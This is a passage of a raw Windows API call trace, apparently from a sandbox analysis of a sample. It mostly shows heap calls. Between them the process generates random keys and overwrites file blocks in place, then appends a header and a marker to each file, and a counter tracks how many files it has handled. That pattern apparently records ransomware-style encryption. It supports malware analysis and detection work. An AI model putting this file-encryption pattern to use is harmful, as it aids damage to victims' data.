0x4f10000 [0082.345] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.345] GetProcessHeap () returned 0x4f10000 [0082.345] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.345] GetProcessHeap () returned 0x4f10000 [0082.345] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.345] GetProcessHeap () returned 0x4f10000 [0082.345] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.345] GetProcessHeap () returned 0x4f10000 [0082.345] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.345] GetProcessHeap () returned 0x4f10000 [0082.345] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.346] GetProcessHeap () returned 0x4f10000 [0082.346] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.346] GetProcessHeap () returned 0x4f10000 [0082.346] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.346] GetProcessHeap () returned 0x4f10000 [0082.346] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.346] GetProcessHeap () returned 0x4f10000 [0082.346] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.346] GetProcessHeap () returned 0x4f10000 [0082.346] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.346] GetProcessHeap () returned 0x4f10000 [0082.346] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.346] GetProcessHeap () returned 0x4f10000 [0082.346] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.346] GetProcessHeap () returned 0x4f10000 [0082.346] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.346] GetProcessHeap () returned 0x4f10000 [0082.346] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.346] GetProcessHeap () returned 0x4f10000 [0082.346] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.346] GetProcessHeap () returned 0x4f10000 [0082.346] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.346] GetProcessHeap () returned 0x4f10000 [0082.346] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.346] GetProcessHeap () returned 0x4f10000 [0082.346] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.346] GetProcessHeap () returned 0x4f10000 [0082.346] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.346] GetProcessHeap () returned 0x4f10000 [0082.346] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.346] GetProcessHeap () returned 0x4f10000 [0082.346] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0082.346] GetProcessHeap () returned 0x4f10000 [0082.346] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.346] GetProcessHeap () returned 0x4f10000 [0082.346] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0082.346] GetProcessHeap () returned 0x4f10000 [0082.347] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0082.347] GetProcessHeap () returned 0x4f10000 [0082.347] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0082.347] GetProcessHeap () returned 0x4f10000 [0082.347] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0082.347] GetProcessHeap () returned 0x4f10000 [0082.347] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0082.347] GetProcessHeap () returned 0x4f10000 [0082.347] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0082.347] GetProcessHeap () returned 0x4f10000 [0082.347] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.347] GetProcessHeap () returned 0x4f10000 [0082.347] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0082.347] GetProcessHeap () returned 0x4f10000 [0082.347] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.347] GetProcessHeap () returned 0x4f10000 [0082.347] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.347] GetProcessHeap () returned 0x4f10000 [0082.347] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.347] GetProcessHeap () returned 0x4f10000 [0082.347] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.347] GetProcessHeap () returned 0x4f10000 [0082.347] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.347] GetProcessHeap () returned 0x4f10000 [0082.347] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.347] GetProcessHeap () returned 0x4f10000 [0082.347] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.347] GetProcessHeap () returned 0x4f10000 [0082.347] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.348] GetProcessHeap () returned 0x4f10000 [0082.348] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.348] GetProcessHeap () returned 0x4f10000 [0082.348] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.348] GetProcessHeap () returned 0x4f10000 [0082.348] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.348] GetProcessHeap () returned 0x4f10000 [0082.348] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.348] GetProcessHeap () returned 0x4f10000 [0082.348] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.348] GetProcessHeap () returned 0x4f10000 [0082.348] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.348] GetProcessHeap () returned 0x4f10000 [0082.348] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.348] GetProcessHeap () returned 0x4f10000 [0082.348] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.348] GetProcessHeap () returned 0x4f10000 [0082.348] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.348] GetProcessHeap () returned 0x4f10000 [0082.348] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.348] GetProcessHeap () returned 0x4f10000 [0082.348] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.348] GetProcessHeap () returned 0x4f10000 [0082.348] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.348] GetProcessHeap () returned 0x4f10000 [0082.348] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.348] GetProcessHeap () returned 0x4f10000 [0082.348] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.349] GetProcessHeap () returned 0x4f10000 [0082.349] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.349] GetProcessHeap () returned 0x4f10000 [0082.349] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.349] GetProcessHeap () returned 0x4f10000 [0082.349] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0082.349] GetProcessHeap () returned 0x4f10000 [0082.349] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.349] GetProcessHeap () returned 0x4f10000 [0082.349] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0082.349] GetProcessHeap () returned 0x4f10000 [0082.349] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0082.349] GetProcessHeap () returned 0x4f10000 [0082.349] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0082.349] GetProcessHeap () returned 0x4f10000 [0082.349] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0082.349] SetFilePointerEx (in: hFile=0x8c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.349] WriteFile (in: hFile=0x8c0, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0xff, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0xff, lpOverlapped=0x0) returned 1 [0082.349] WriteFile (in: hFile=0x8c0, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0082.349] GetProcessHeap () returned 0x4f10000 [0082.349] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0082.349] GetProcessHeap () returned 0x4f10000 [0082.349] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0082.349] GetProcessHeap () returned 0x4f10000 [0082.350] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0082.350] CloseHandle (hObject=0x8c0) returned 1 [0082.351] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 81 [0082.351] SetFilePointerEx (in: hFile=0x8c4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.351] ReadFile (in: hFile=0x8c4, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0082.351] SetFilePointerEx (in: hFile=0x8c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.351] GetProcessHeap () returned 0x4f10000 [0082.351] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0082.351] GetProcessHeap () returned 0x4f10000 [0082.351] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0082.351] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0082.351] GetProcessHeap () returned 0x4f10000 [0082.351] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0082.351] ReadFile (in: hFile=0x8c4, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0082.400] SetFilePointerEx (in: hFile=0x8c4, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.400] WriteFile (in: hFile=0x8c4, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0082.400] GetProcessHeap () returned 0x4f10000 [0082.400] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0082.400] GetProcessHeap () returned 0x4f10000 [0082.400] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.400] GetProcessHeap () returned 0x4f10000 [0082.400] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0082.400] GetProcessHeap () returned 0x4f10000 [0082.400] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.400] GetProcessHeap () returned 0x4f10000 [0082.400] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0082.400] GetProcessHeap () returned 0x4f10000 [0082.400] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.400] GetProcessHeap () returned 0x4f10000 [0082.401] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.401] GetProcessHeap () returned 0x4f10000 [0082.401] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.401] GetProcessHeap () returned 0x4f10000 [0082.401] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.401] GetProcessHeap () returned 0x4f10000 [0082.401] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.401] GetProcessHeap () returned 0x4f10000 [0082.401] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.401] GetProcessHeap () returned 0x4f10000 [0082.401] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.401] GetProcessHeap () returned 0x4f10000 [0082.401] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.401] GetProcessHeap () returned 0x4f10000 [0082.401] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.401] GetProcessHeap () returned 0x4f10000 [0082.401] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.401] GetProcessHeap () returned 0x4f10000 [0082.401] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.401] GetProcessHeap () returned 0x4f10000 [0082.401] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.401] GetProcessHeap () returned 0x4f10000 [0082.401] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.401] GetProcessHeap () returned 0x4f10000 [0082.401] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.401] GetProcessHeap () returned 0x4f10000 [0082.401] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.401] GetProcessHeap () returned 0x4f10000 [0082.401] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.401] GetProcessHeap () returned 0x4f10000 [0082.401] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.401] GetProcessHeap () returned 0x4f10000 [0082.401] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.401] GetProcessHeap () returned 0x4f10000 [0082.402] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.402] GetProcessHeap () returned 0x4f10000 [0082.402] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.402] GetProcessHeap () returned 0x4f10000 [0082.402] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.402] GetProcessHeap () returned 0x4f10000 [0082.402] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.402] GetProcessHeap () returned 0x4f10000 [0082.402] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.402] GetProcessHeap () returned 0x4f10000 [0082.402] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.402] GetProcessHeap () returned 0x4f10000 [0082.402] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.402] GetProcessHeap () returned 0x4f10000 [0082.402] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.402] GetProcessHeap () returned 0x4f10000 [0082.402] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.402] GetProcessHeap () returned 0x4f10000 [0082.402] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.402] GetProcessHeap () returned 0x4f10000 [0082.402] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.402] GetProcessHeap () returned 0x4f10000 [0082.402] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.402] GetProcessHeap () returned 0x4f10000 [0082.402] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.402] GetProcessHeap () returned 0x4f10000 [0082.402] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.402] GetProcessHeap () returned 0x4f10000 [0082.402] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.402] GetProcessHeap () returned 0x4f10000 [0082.402] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0082.402] GetProcessHeap () returned 0x4f10000 [0082.402] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.402] GetProcessHeap () returned 0x4f10000 [0082.402] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0082.402] GetProcessHeap () returned 0x4f10000 [0082.402] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0082.403] GetProcessHeap () returned 0x4f10000 [0082.403] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0082.403] GetProcessHeap () returned 0x4f10000 [0082.403] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0082.403] GetProcessHeap () returned 0x4f10000 [0082.403] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0082.403] GetProcessHeap () returned 0x4f10000 [0082.403] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0082.403] GetProcessHeap () returned 0x4f10000 [0082.403] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.403] GetProcessHeap () returned 0x4f10000 [0082.403] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0082.403] GetProcessHeap () returned 0x4f10000 [0082.403] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.403] GetProcessHeap () returned 0x4f10000 [0082.403] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.403] GetProcessHeap () returned 0x4f10000 [0082.403] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.403] GetProcessHeap () returned 0x4f10000 [0082.403] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.403] GetProcessHeap () returned 0x4f10000 [0082.403] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.403] GetProcessHeap () returned 0x4f10000 [0082.403] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.403] GetProcessHeap () returned 0x4f10000 [0082.403] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.403] GetProcessHeap () returned 0x4f10000 [0082.403] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.404] GetProcessHeap () returned 0x4f10000 [0082.404] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.404] GetProcessHeap () returned 0x4f10000 [0082.404] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.404] GetProcessHeap () returned 0x4f10000 [0082.404] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.404] GetProcessHeap () returned 0x4f10000 [0082.404] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.404] GetProcessHeap () returned 0x4f10000 [0082.404] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.404] GetProcessHeap () returned 0x4f10000 [0082.404] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.404] GetProcessHeap () returned 0x4f10000 [0082.404] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.404] GetProcessHeap () returned 0x4f10000 [0082.404] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.405] GetProcessHeap () returned 0x4f10000 [0082.405] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.405] GetProcessHeap () returned 0x4f10000 [0082.405] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.405] GetProcessHeap () returned 0x4f10000 [0082.405] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.405] GetProcessHeap () returned 0x4f10000 [0082.405] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.405] GetProcessHeap () returned 0x4f10000 [0082.405] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.405] GetProcessHeap () returned 0x4f10000 [0082.405] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.405] GetProcessHeap () returned 0x4f10000 [0082.405] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.405] GetProcessHeap () returned 0x4f10000 [0082.405] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.405] GetProcessHeap () returned 0x4f10000 [0082.405] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0082.405] GetProcessHeap () returned 0x4f10000 [0082.405] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.405] GetProcessHeap () returned 0x4f10000 [0082.405] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0082.405] GetProcessHeap () returned 0x4f10000 [0082.405] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0082.405] GetProcessHeap () returned 0x4f10000 [0082.405] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0082.405] GetProcessHeap () returned 0x4f10000 [0082.405] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0082.405] SetFilePointerEx (in: hFile=0x8c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.406] WriteFile (in: hFile=0x8c4, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0082.406] WriteFile (in: hFile=0x8c4, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0082.406] GetProcessHeap () returned 0x4f10000 [0082.406] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0082.406] GetProcessHeap () returned 0x4f10000 [0082.406] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0082.406] GetProcessHeap () returned 0x4f10000 [0082.406] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0082.406] CloseHandle (hObject=0x8c4) returned 1 [0082.407] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 82 [0082.407] SetFilePointerEx (in: hFile=0x8c8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.407] ReadFile (in: hFile=0x8c8, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 